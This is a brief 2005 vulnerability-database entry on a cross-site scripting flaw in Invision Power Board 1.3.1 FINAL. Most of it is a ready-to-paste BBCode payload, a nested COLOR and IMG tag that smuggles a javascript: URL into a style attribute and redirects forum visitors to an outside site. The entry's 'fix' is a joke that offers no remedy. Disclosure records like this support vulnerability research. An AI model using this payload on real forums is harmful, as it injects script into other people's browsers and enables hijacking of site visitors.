Invision Power Boards 1.3.1 FINAL XSS Exploit

2005-02-18T00:00:00
ID SECURITYVULNS:DOC:7859
Type securityvulns
Reporter Securityvulns
Modified 2005-02-18T00:00:00

Description

Description: Lack of checking in the SML codes. Exploit: Put this into any signature or post on an invision forum: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');") [/color] Fix: I'm not good at regexes :)